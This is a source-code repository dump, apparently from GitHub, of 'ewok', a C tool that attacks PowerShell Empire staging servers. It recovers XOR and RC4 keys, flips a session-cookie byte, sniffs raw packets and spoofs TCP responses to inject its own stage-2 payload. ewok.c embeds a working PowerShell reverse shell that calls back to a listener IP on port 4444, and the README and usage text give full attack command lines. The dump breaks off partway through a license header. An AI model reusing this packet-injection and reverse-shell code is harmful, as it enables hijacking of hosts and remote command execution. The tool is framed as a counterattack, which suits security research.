Caller is responsible for freeing the returned buffer. Returned buffer is 93 | * nul terminated to make it easier to use as a C string. The nul terminator is 94 | * not included in out_len. 95 | */ 96 | static const unsigned char base64_table[65] = 97 | "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; 98 | unsigned char *base64_encode(const unsigned char *src, int len) 99 | { 100 | unsigned char *out, *pos; 101 | const unsigned char *end, *in; 102 | int olen; 103 | int line_len; 104 | 105 | olen = len * 4 / 3 + 4; /* 3-byte blocks to 4-byte */ 106 | olen += olen / 72; /* line feeds */ 107 | olen++; /* nul termination */ 108 | if (olen < len) 109 | return NULL; /* integer overflow */ 110 | out = malloc(olen); 111 | if (out == NULL) { 112 | perror("can't allocate memory"); 113 | exit(1); 114 | } 115 | 116 | end = src + len; 117 | in = src; 118 | pos = out; 119 | line_len = 0; 120 | while (end - in >= 3) { 121 | *pos++ = base64_table[in[0] >> 2]; 122 | *pos++ = base64_table[((in[0] & 0x03) << 4) | (in[1] >> 4)]; 123 | *pos++ = base64_table[((in[1] & 0x0f) << 2) | (in[2] >> 6)]; 124 | *pos++ = base64_table[in[2] & 0x3f]; 125 | in += 3; 126 | line_len += 4; 127 | if (line_len >= 72) { 128 | *pos++ = '\n'; 129 | line_len = 0; 130 | } 131 | } 132 | 133 | if (end - in) { 134 | *pos++ = base64_table[in[0] >> 2]; 135 | if (end - in == 1) { 136 | *pos++ = base64_table[(in[0] & 0x03) << 4]; 137 | *pos++ = '='; 138 | } else { 139 | *pos++ = base64_table[((in[0] & 0x03) << 4) | (in[1] >> 4)]; 140 | *pos++ = base64_table[(in[1] & 0x0f) << 2]; 141 | } 142 | *pos++ = '='; 143 | line_len += 4; 144 | } 145 | 146 | if (line_len) 147 | *pos++ = '\n'; 148 | 149 | *pos = '\0'; 150 | return out; 151 | } 152 | 153 | 154 | /** 155 | * base64_decode - Base64 decode 156 | * @src: Data to be decoded 157 | * @len: Length of the data to be decoded 158 | * @out_len: Pointer to output length variable 159 | * Returns: Allocated buffer of out_len bytes of decoded data, 160 | * or %NULL on failure 161 | * 162 | * Caller is responsible for freeing the returned buffer. 163 | */ 164 | uint8_t *base64_decode(const unsigned char *src, int *outlen) 165 | { 166 | unsigned char dtable[256], *out, *pos, block[4], tmp; 167 | int i, count, olen; 168 | int pad = 0; 169 | 170 | memset(dtable, 0x80, 256); 171 | for (i = 0; i < sizeof(base64_table) - 1; i++) 172 | dtable[base64_table[i]] = (unsigned char) i; 173 | dtable['='] = 0; 174 | 175 | count = 0; 176 | for (i = 0; i < strlen(src); i++) { 177 | if (dtable[src[i]] != 0x80) 178 | count++; 179 | } 180 | 181 | if (count == 0 || count % 4) 182 | return NULL; 183 | 184 | olen = count / 4 * 3; 185 | pos = out = malloc(olen); 186 | if (out == NULL) { 187 | perror("can't allocate memory"); 188 | exit(1); 189 | } 190 | 191 | count = 0; 192 | for (i = 0; i < strlen(src); i++) { 193 | tmp = dtable[src[i]]; 194 | if (tmp == 0x80) 195 | continue; 196 | 197 | if (src[i] == '=') 198 | pad++; 199 | block[count] = tmp; 200 | count++; 201 | if (count == 4) { 202 | *pos++ = (block[0] << 2) | (block[1] >> 4); 203 | *pos++ = (block[1] << 4) | (block[2] >> 2); 204 | *pos++ = (block[2] << 6) | block[3]; 205 | count = 0; 206 | if (pad) { 207 | if (pad == 1) 208 | pos--; 209 | else if (pad == 2) 210 | pos -= 2; 211 | else { 212 | /* Invalid padding */ 213 | free(out); 214 | return NULL; 215 | } 216 | break; 217 | } 218 | } 219 | } 220 | 221 | *outlen = pos - out; 222 | return out; 223 | } 224 | 225 | // take a Powershell Session cookie and use XOR 226 | // to toggle the "language" byte between 0x01 and 0x02 227 | // we do this, in case we download an encrypted powershell 228 | // script. We really want python, because it has less 229 | // entropy. 230 | 231 | char *swaplanguage(char *session) 232 | { 233 | 234 | int out; 235 | uint8_t *raw; 236 | 237 | 238 | raw = base64_decode(session, &out); 239 | if ((raw == NULL) || (out != 20)) { 240 | fprintf(stderr, "invalid cookie"); 241 | exit(1); 242 | } 243 | raw[12] = raw[12] ^ 0x03; 244 | 245 | return (base64_encode(raw, 20)); 246 | } 247 | 248 | // extract the XOR key from a ciphertext of ciphertextlen bytes 249 | // keylen is the length of the key you expect to find 250 | // this script assumes that the only possible values in the key are 251 | // 012345679abcdef 252 | // it also assumes you are "decrypting" powershell scripts 253 | 254 | char *grabxorkey(char *ciphertext, int ciphertextlen, int keylen) 255 | { 256 | int i; 257 | int keyoffset; 258 | int pos; 259 | int score; 260 | int highscore; 261 | char charbuf; 262 | char outchar; 263 | // I did frequency counts for PowerShell scripts 264 | char *highfreq = "pDO\\m\"'-[]yP()lcdRnCasN=Io;AirTt SE.e$"; 265 | // the keys are limited to these characters 266 | char *candidates = "0123456789abcdef"; 267 | char *outkey; 268 | 269 | // this is where we store the key we are looking for 270 | outkey = (char *) malloc(keylen + 1); 271 | if (outkey == NULL) { 272 | perror("can't allocate memory"); 273 | exit(1); 274 | } 275 | memset(outkey, 0x00, keylen + 1); 276 | 277 | // guess every possible key value for each offset in the key 278 | for (keyoffset = 0; keyoffset < keylen; keyoffset++) { 279 | highscore = 0; 280 | for (i = 0; i < strlen(candidates); i++) { 281 | // when we start guessing, every high frequency 282 | // character counts as a hit, so if we xor(cipher, guess) 283 | // and we get a high frequency character, we get lots of 284 | // points. normal letters are less points 285 | score = 0; 286 | for (pos = keyoffset; pos < (ciphertextlen - keylen); 287 | pos = pos + keylen) { 288 | charbuf = (candidates[i] ^ ciphertext[pos]); 289 | // points if it is a letter 290 | if (isalpha(charbuf)) { 291 | score++; 292 | } 293 | // extra points for high frequency characters 294 | if (strchr(highfreq, (int) charbuf) != NULL) { 295 | score++; 296 | } 297 | // EVERY character should be on your keyboard 298 | if (!isascii(charbuf)) { 299 | score = -10; 300 | } 301 | 302 | } 303 | if (score > highscore) { 304 | outchar = candidates[i]; 305 | highscore = score; 306 | } 307 | } 308 | outkey[keyoffset] = outchar; 309 | } 310 | return (outkey); 311 | } 312 | 313 | // figures out the XOR key used to "encrypt" URL 314 | // it's a front end for "grabxorkey()" 315 | char *grabkey(char *url, int keylen) 316 | { 317 | char *keybuf; 318 | int outputsize; 319 | uint8_t **output; 320 | 321 | outputsize = urltomem(url, "abc", &output); 322 | 323 | if (keylen > outputsize) { 324 | perror("file too small"); 325 | exit(1); 326 | } 327 | 328 | keybuf = (char *)grabxorkey((char *)output, outputsize, keylen); 329 | free(output); 330 | 331 | /* we're done with libcurl, so clean it up */ 332 | 333 | return (keybuf); 334 | } 335 | 336 | uint8_t *packageRC4data(char *url, char *cookie, char *pfilename, 337 | char *payload) 338 | { 339 | uint8_t *output; 340 | uint8_t **stagebuf; 341 | int stagebufsize; 342 | int ivsize = 4; 343 | 344 | FILE *source; 345 | struct stat info; 346 | uint8_t *filebuf; 347 | 348 | // read the template into memory at *filebuf 349 | if (stat(pfilename, &info) < 0) { 350 | perror("can not access file"); 351 | exit(1); 352 | } 353 | filebuf = (uint8_t *) malloc(info.st_size); 354 | if (filebuf == NULL) { 355 | perror("can't allocate memory"); 356 | exit(1); 357 | } 358 | 359 | source = fopen(pfilename, "rb"); 360 | if (source <= 0) { 361 | perror("can't allocate memory"); 362 | exit(1); 363 | } 364 | if(fread(filebuf, info.st_size, 1, source) == 0) { 365 | fprintf(stderr, "can't read file\n"); 366 | exit(1); 367 | } 368 | fclose(source); 369 | 370 | // read the staging payload into *stagebuf 371 | stagebufsize = urltomem(url, cookie, &stagebuf); 372 | // Powershell case swapping makes RC4 attacks harder 373 | // so we modify the cookie to make sure we get Python 374 | if (stagebufsize < info.st_size) { 375 | if (verbose) { 376 | printf("modifying session key for Python\n"); 377 | } 378 | stagebufsize = urltomem(url, swaplanguage(cookie), &stagebuf); 379 | } 380 | 381 | if (stagebufsize < (strlen(payload) + ivsize)) { 382 | fprintf(stderr, "The payload won't fit\n"); 383 | fprintf(stderr, "original ciphertext is too small\n"); 384 | exit(1); 385 | } 386 | if (info.st_size < (strlen(payload) + ivsize)) { 387 | fprintf(stderr, "The payload won't fit\n"); 388 | fprintf(stderr, "Known plaintext is too small\n"); 389 | exit(1); 390 | } 391 | 392 | 393 | output = (uint8_t *) stagebuf; 394 | // extract the RC4 PRNG output key 395 | xormem(output + 4, filebuf, strlen(payload)); 396 | // now encode our data 397 | xormem(output + 4, payload, strlen(payload)); 398 | 399 | return (output); 400 | } 401 | 402 | 403 | 404 | 405 | -------------------------------------------------------------------------------- /ewok/Makefile: -------------------------------------------------------------------------------- 1 | CC = gcc 2 | CFLAGS = -O3 3 | PROGNAME = ewok.salad 4 | 5 | 6 | default: 7 | $(CC) $(CFLAGS) -c CryptoShenanigans.c 8 | $(CC) $(CFLAGS) -c global.c 9 | $(CC) $(CFLAGS) -c network.c 10 | $(CC) $(CFLAGS) -c http.c 11 | $(CC) $(CFLAGS) ewok.c http.o global.o CryptoShenanigans.o network.o -lcurl -o $(PROGNAME) 12 | 13 | clean: 14 | rm -f *.o $(PROGNAME) 15 | -------------------------------------------------------------------------------- /ewok/Readme.MD: -------------------------------------------------------------------------------- 1 | Ewok is a utility that demonstrates man-in-the-middle (MiTM) [counter]attacks 2 | against Powershell Empire. 3 | 4 | Powershell Empire is a well designed, extremely functional, and very useful 5 | remote administration tool for Microsoft Windows hosts. It is a wise choice 6 | for anyone who wishes to maintain control over a compromised Microsoft Windows 7 | host. However, its staging process is also vulnerable to MiTM. 8 | 9 | This program is primarily a packet sniffer. Anyone wishing to use it in a live 10 | environment should have the following: 11 | 12 | - Access to network traffic for the compromised host(s) 13 | - Network access to the TCP port running the Powershell Empire staging server 14 | 15 | When this program is used in a live environment, it does the following: 16 | 17 | 1) It reaches out to the staging server and acquires a live stage 2 payload 18 | 2) It repackages that payload with its own software 19 | 3) It delivers the payload by using packet spoofing to "overwrite" the HTTP 20 | responses from the staging server. 21 | 22 | However, the program can be used to assist in these attacks by constructing 23 | the payload that would presumably be delivered in a manner of the user's 24 | choosing. If the user wants to redirect web traffic to an alternate web server 25 | instead of the staging server, for example, the payload can be delivered that 26 | way too. 27 | 28 | [Counter] Attacks against Powershell Empire 1.x will require the user to know 29 | the URL for the staging server. The URL may be acquired through brute-force, 30 | although this functionality is currently not implemented. 31 | 32 | Here is a sample command line for targeting Powershell Empire 1.6: 33 | 34 | ./ewok.salad -u http://10.1.1.10:8080/login/process.php -c 172.16.0.5 35 | # This command acquires the stage 2 payload from the URL listed, 36 | # and then delivers a modified payload that causes the compromised 37 | # host to execute a reverse shell to 172.16.0.5:4444 instead of 38 | # introducing Powershell Empire remote administration software. 39 | 40 | [Counter] Attacks against Powershell Empire 2.x will require a valid 41 | "session cookie". This valid is delivered to the staging server and mimic's 42 | an actual session cookie that might be used to track web users. 43 | This value is a base64 encoded chunk of encrypted data. When decrypted, 44 | it is a binary description of the data the staging script is requesting. 45 | We are most concerned with the 11th byte of this field, because it describes 46 | the language that the next set of instructions will be written in. In practice, 47 | its value will be either 0x01 for Powershell or 0x02 for Python. The Python 48 | payload is easier to modify, so the software alters this value, if the staging 49 | server returns the "wrong" script initially. Because the cookie is encrypted 50 | with RC4, modifying it to cause the server to return the desired script takes 51 | only the three following steps: 52 | 1) Decode the "session cookie" as a base64 encoded string 53 | 2) XOR byte 12 against 0x03 54 | 3) Re-encode the modified data as a base64 encoded string 55 | 4) Request the script again 56 | 57 | Here is a sample command line for targeting Powershell Empire 2.0: 58 | 59 | ./ewok.salad -s WVUP/J2edjRlqEH9ctiRu75mpOM= -u http://10.1.1.10/login/process.php -t ./template -c 172.16.0.5 60 | # This command acquires the stage 2 payload, and if necessary, requests 61 | # the Python version of this software. It then repackages it with the 62 | # desired software. By default, this software is a Powershell "reverse 63 | # shell. The host specified with the "-c" flag is the host that will 64 | # receive this reverse shell on TCP port 4444 65 | # The "-t" flag designates the plaintext version of the data we are 66 | # expecting to acqurie. We assume that "./template" in this example is 67 | # the Python staging software. 68 | 69 | This above example requires the user to have a plaintext version of the Python 70 | staging software. This file is actual software, and distributing it without the 71 | consent of its authors is problematic. Users can acquire their own copy by 72 | executing the following command (the script is included in this distribution: 73 | 74 | ./grabtemplate.sh ./template.sh 75 | 76 | This program also allows users to create their own stage 2 payload for 77 | distribution elsewhere. The "-o" flag will allow for this payload to be 78 | written to a file. 79 | 80 | Powershell Empire's stage 1 (we aren't counting from 0) staging script is what 81 | it's users may observe when introducing this software via a command line. 82 | The commands that typically introduce this software to a compromised host 83 | include a base64 encoded string that decodes to the "stage 1" script. This 84 | script is relatively small, and does the following tasks: 85 | 86 | 1) Request the [much larger] stage 2 payload from the staging server via 87 | HTTP 88 | 2) Decrypt (version 2.0) or de-obfuscate (version 1.x) the stage 2 payload 89 | with the shared secret key 90 | 3) Execute this payload 91 | 92 | The stage 1 script does not check signatures or validate the payload before 93 | executing what it has decrypted/deobfuscated. This utility repackages the 94 | "stage 2" payload and delivers it through packet spoofing. Assuming that 95 | "ewok" has the proper network access, it will overwrite the HTTP responses 96 | so that the "stage 1" script will download and decrypt/deobfuscate its 97 | scripts instead of the actual Powershell Empire stage 2 script. 98 | 99 | "Ewok" accomplishes the repackaging by attacking the encoding/encryption of 100 | these payloads. Version 1.x uses XOR and a shared secret key to encode/decode 101 | this payload. Because the plaintext is a Powershell Script, we can predict the 102 | frequencies that certain characters occur. Some will occur much more often than 103 | others. Furthermore, the key that it uses to XOR/unXOR the payload is an ASCII 104 | representation of a hexadecimal number. Therefore there are only 16 possible 105 | values for each offset. The limited keyspace and the predictability of the 106 | plaintext enable [counter]attackers to acquire the key through accomplishes 107 | modeling. "Ewok" does this, and uses the key to create a new payload. 108 | 109 | The repackaging for 2.x payloads is slightly different. RC4 is vulnerable to 110 | MiTM, assuming that the [counter]attacker knows the plaintext. "Ewok" requests 111 | the Python payload, because it has much less entropy than the Powershell 112 | payload, due to Powershell Empire's randomization of case for Powershell 113 | commands. 114 | -------------------------------------------------------------------------------- /ewok/ewok.c: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #include 34 | #include 35 | #define _GNU_SOURCE 36 | #include 37 | #include 38 | #include 39 | #include 40 | #include 41 | #include 42 | #include 43 | #include 44 | #include 45 | #include 46 | #include 47 | #include 48 | #include 49 | #include 50 | #include 51 | #include 52 | #include 53 | #include 54 | #include "network.h" 55 | #include "global.h" 56 | 57 | 58 | char *grabkey(char *url, int keylen); 59 | uint8_t *xorstr(char *str, char *key); 60 | uint8_t *packageRC4data(char *url, char *cookie, char *pfilename, 61 | char *payload); 62 | int filterIP(int sock, uint32_t ip); 63 | 64 | 65 | 66 | char *outputheader = 67 | "HTTP/1.0 200 OK\x0d\x0a\x43ontent-Length: %i\x0d\x0a\x0d\x0a"; 68 | // "outputscript" has the default powershell payload. 69 | // I got this payload from: 70 | //http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html 71 | //Nikhil "SamratAshok" Mittal 72 | // Thank you, Mr. Mittal 73 | 74 | char *outputscript = 75 | "function Start-Shell{$sm=(New-Object Net.Sockets.TCPClient('%s',4444)).GetStream();[byte[]]$bt=0..255|%%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}} Start-Shell # \n"; 76 | 77 | int sniffloop(uint32_t stagingip, int8_t * payload, int payloadlen) 78 | { 79 | uint8_t *pkt; 80 | int pktlen; 81 | int sock; 82 | int payloadoffset; 83 | uint32_t seqtmp; 84 | struct in_addr addr; 85 | struct iphdr *ip; 86 | struct tcphdr *tcp; 87 | 88 | char *interface = "eth0"; 89 | 90 | sock = getrawsock(interface); 91 | // Use LPF/BPF to ignore all data except staging server TCP packets 92 | filterIP(sock, stagingip); 93 | 94 | pkt = (uint8_t *) malloc(MAXPACKET); 95 | if (pkt == NULL) { 96 | perror("can't allocate memory"); 97 | exit(1); 98 | } 99 | 100 | ip = (struct iphdr *) (pkt + (sizeof(struct ether_header))); 101 | tcp = 102 | (struct tcphdr *) (pkt + (sizeof(struct ether_header)) + 103 | (sizeof(struct iphdr))); 104 | 105 | 106 | for (pktlen = 0; pktlen >= 0; pktlen = read(sock, pkt, MAXPACKET)) { 107 | if (pktlen > 0) { 108 | payloadoffset = 109 | ((sizeof(struct iphdr)) + (sizeof(struct ether_header)) + 110 | (tcp->th_off * 4)); 111 | 112 | // if we see a PSH, spoof a response with our data 113 | if (tcp->th_flags & TH_PUSH) { 114 | 115 | seqtmp = htonl(ntohl(tcp->seq) + (pktlen - payloadoffset)); 116 | if (verbose) { 117 | addr.s_addr = ip->saddr; 118 | printf("sending payload to %s\n", inet_ntoa(addr)); 119 | } 120 | sendtcpdata(ip->daddr, ip->saddr, tcp->dest, tcp->source, payload, payloadlen, tcp->ack_seq, seqtmp, ip->id, TH_PUSH | TH_ACK, 1); // get rid of the 1 121 | 122 | } 123 | 124 | } 125 | } 126 | 127 | return (0); 128 | } 129 | 130 | // isolate the server in "url" and resolve it via DNS 131 | uint32_t resolveIPfromURL(char *url) 132 | { 133 | char *hostptr; 134 | char *tptr; 135 | char *prefix = "http://"; 136 | char *prefixs = "https://"; 137 | uint32_t resolved; 138 | 139 | // we can't work from *url, because constants crash strcasecmp 140 | tptr = (char *) malloc(strlen(url)); 141 | if (tptr == NULL) { 142 | perror("can't allocate memory"); 143 | exit(1); 144 | } 145 | memset(tptr, 0x00, strlen(url)); 146 | memcpy(tptr, url, strlen(url)); 147 | 148 | hostptr = strcasestr(tptr, prefix); 149 | if (hostptr != NULL) { 150 | hostptr += strlen(prefix); 151 | } else { 152 | hostptr = (char *) strcasestr(tptr, prefixs); 153 | if (hostptr != NULL) { 154 | hostptr += strlen(prefixs); 155 | } 156 | } 157 | 158 | // terminate hte hostname with a null 159 | strtok(hostptr, " :/"); 160 | 161 | // finally use DNS 162 | resolved = htonl(resolveipv4(hostptr)); 163 | free(tptr); 164 | 165 | return (resolved); 166 | } 167 | 168 | 169 | void usage(char *progname) 170 | { 171 | printf("%s is a MiTM helper utility for Powershell Empire\n", progname); 172 | printf(" -h\tDisplays this help message.\n"); 173 | printf(" -u\tURL for staging service\n"); 174 | printf(" -c\tIP for your console/listener\n"); 175 | printf(" -t\tPlaintext file for RC4 attacks\n"); 176 | printf(" \t(Contents must match the server's expected plaintext message)\n"); 177 | printf(" -s\tSession identifier for RC4 attacks\n"); 178 | printf(" \t(the value of the \"session\" cookie)\n"); 179 | printf(" -o\tOutput file to use instead of packet spoofing\n"); 180 | printf(" -i\tNetwork interface for spoofing/sniffing ('eth0' is default)\n"); 181 | printf(" -v\tVerbose mode\n"); 182 | printf(" -p\tText file that has the plaintext payload\n"); 183 | printf("Examples:\n"); 184 | printf("%s -u http://10.1.1.10:8080/login/process.php -c 172.16.0.5\n", progname); 185 | printf("\tTargets Powershell Empire version 1.6 and directs hosts to\n"); 186 | printf("\tsend 'connect back' shells to 172.16.0.5\n"); 187 | printf("%s -s WVUP/J2edjRlqEH9ctiRu75mpOM= -u http://10.1.1.10/login/process.php -t ./t -c 172.16.0.5\n", progname); 188 | printf("\tTargets Powershell Empire version 2.0.\n"); 189 | printf("\tThe session cookie (-s) is required for RC4 attacks.\n"); 190 | printf("%s -u http://10.1.1.10:8080/login/process.php -c 172.16.0.5 -o payload.bin -i eth1\n", progname); 191 | printf("\tTargets PowershellEmpire 1.6, but write the attack payload to 'payload.bin' instead of delivering it by packet spoofing. Redirecting powershell hosts to a web server that has 'payload.bin' should have the same effect as packet spoofing.\n"); 192 | printf("\tThis example also uses the 'eth1' interface\n"); 193 | 194 | } 195 | 196 | int main(int argc, char *argv[]) 197 | { 198 | int keylen = 32; 199 | char *key; 200 | char c; 201 | char *stagingURL = NULL; 202 | char *shellsvr = NULL; 203 | char *payloadfile = NULL; 204 | char *payload; 205 | uint8_t *xorpayload; 206 | char *outhdrs; 207 | char *cookie; 208 | int payloadlen; 209 | uint8_t *outbuf; 210 | char *pfilename = NULL; 211 | char *outputfile = NULL; 212 | struct stat info; 213 | FILE *dest; 214 | FILE *source; 215 | 216 | // defaults for global variables 217 | verbose = 0; 218 | interface = "eth0"; 219 | 220 | while ((c = getopt(argc, argv, "hi:u:c:t:s:o:vp:")) != -1) { 221 | switch (c) { 222 | case 'h': // probably help 223 | usage(argv[0]); 224 | return (0); 225 | break; 226 | case 'u': // URL for staging server 227 | stagingURL = optarg; 228 | break; 229 | case 'c': // IP for "console" 230 | shellsvr = optarg; 231 | break; 232 | case 't': // plaintext file for RC4 233 | pfilename = optarg; 234 | break; 235 | case 's': // session cookie 236 | cookie = optarg; 237 | break; 238 | case 'o': // output file 239 | outputfile = optarg; 240 | break; 241 | case 'i': // output file 242 | interface = optarg; 243 | break; 244 | case 'v': // verbose mode 245 | verbose++; 246 | break; 247 | case 'p': 248 | payloadfile = optarg; 249 | break; 250 | default: 251 | break; 252 | } 253 | } 254 | 255 | if (stagingURL == NULL) { 256 | fprintf(stderr, "I need a url for the staging server\n"); 257 | exit(1); 258 | } 259 | 260 | if (shellsvr == NULL) { 261 | shellsvr = ""; 262 | } 263 | // how much data are we injecting? 264 | if(payloadfile == NULL) { 265 | payloadlen = strlen(outputscript) + strlen(shellsvr); 266 | payload = (char *) malloc(payloadlen); 267 | if (payload == NULL) { 268 | perror("can't allocate memory"); 269 | exit(1); 270 | } 271 | memset(payload, 0x00, payloadlen); 272 | 273 | // insert the IP defined in 'shellsvr' into the payload 274 | snprintf(payload, payloadlen, outputscript, shellsvr); 275 | } else { 276 | if(stat(payloadfile, &info) < 0) { 277 | perror("can't access file"); 278 | exit(1); 279 | } 280 | payloadlen = info.st_size; 281 | payload = (char *)malloc(payloadlen); 282 | if(payload == NULL) { 283 | perror("can't allocate memory"); 284 | exit(1); 285 | } 286 | source = fopen(payloadfile, "rb"); 287 | if(source < 0) { 288 | fprintf(stderr, "can't open %s\n", payloadfile); 289 | exit(1); 290 | } 291 | if(fread(payload, payloadlen, 1, source) == 0) { 292 | fprintf(stderr, "can't open %s\n", payloadfile); 293 | exit(1); 294 | } 295 | fclose(source); 296 | 297 | } 298 | 299 | // if they don't give us a "plaintext file", then 300 | // assume it's XOR instead of RC4 301 | if (pfilename == NULL) { 302 | if (verbose) { 303 | printf("assuming we are using XOR\n"); 304 | printf("grabbing the XOR key\n"); 305 | } 306 | key = (char *)grabkey(stagingURL, keylen); 307 | if (verbose) { 308 | printf("key = %s\n", key); 309 | } 310 | 311 | xorpayload = xorstr(payload, key); 312 | } else { 313 | if (verbose) { 314 | printf("assuming we are using RC4\n"); 315 | } 316 | // if it's RC4, do this 317 | // we're going to need 4 extra bytes for the IV 318 | payloadlen = payloadlen + 4; // add space for IV 319 | // repackage the payload for RC4 320 | xorpayload = 321 | packageRC4data(stagingURL, cookie, pfilename, payload); 322 | } 323 | 324 | // if the user specifies an output file 325 | // write the payload there and quit 326 | if (outputfile != NULL) { 327 | dest = fopen(outputfile, "w+"); 328 | if (dest == NULL) { 329 | fprintf(stderr, "can't open file %s\n", outputfile); 330 | exit(1); 331 | } 332 | if (verbose) { 333 | printf("writing payload to %s\n", outputfile); 334 | } 335 | fwrite(xorpayload, payloadlen, 1, dest); 336 | fclose(dest); 337 | return (0); 338 | } 339 | // we're going to need some HTTP headers 340 | // allocate the memory, and then populate them 341 | // Conten-Length: is easier than terminating the connection 342 | outhdrs = (char *) malloc(MAXPACKET); 343 | if (outhdrs == NULL) { 344 | perror("can't allocate memory"); 345 | exit(1); 346 | } 347 | memset(outhdrs, 0x00, MAXPACKET); 348 | snprintf(outhdrs, MAXPACKET, outputheader, (payloadlen - 1)); 349 | 350 | outbuf = (uint8_t *) malloc(payloadlen + strlen(outhdrs)); 351 | if (outbuf == NULL) { 352 | perror("can't allocate memory"); 353 | exit(1); 354 | } 355 | // put the headers together with the payload 356 | memcpy(outbuf, outhdrs, strlen(outhdrs)); 357 | memcpy(outbuf + strlen(outhdrs), xorpayload, payloadlen); 358 | 359 | // start listening for PSH | ACKs to the real staging server 360 | sniffloop(resolveIPfromURL(stagingURL), outbuf, 361 | (payloadlen + strlen(outputheader))); 362 | 363 | 364 | return (0); 365 | } 366 | -------------------------------------------------------------------------------- /ewok/example.ps1: -------------------------------------------------------------------------------- 1 | add-type -AssemblyName microsoft.VisualBasic 2 | add-type -AssemblyName System.Windows.Forms 3 | Calc 4 | start-sleep -Milliseconds 500 5 | [Microsoft.VisualBasic.Interaction]::AppActivate("c:\Windows\SysWOW64\calc.exe") 6 | [System.Windows.Forms.SendKeys]::SendWait("31337") 7 | # 8 | -------------------------------------------------------------------------------- /ewok/global.c: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #include 34 | #include 35 | 36 | int verbose; 37 | char *interface; 38 | -------------------------------------------------------------------------------- /ewok/global.h: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 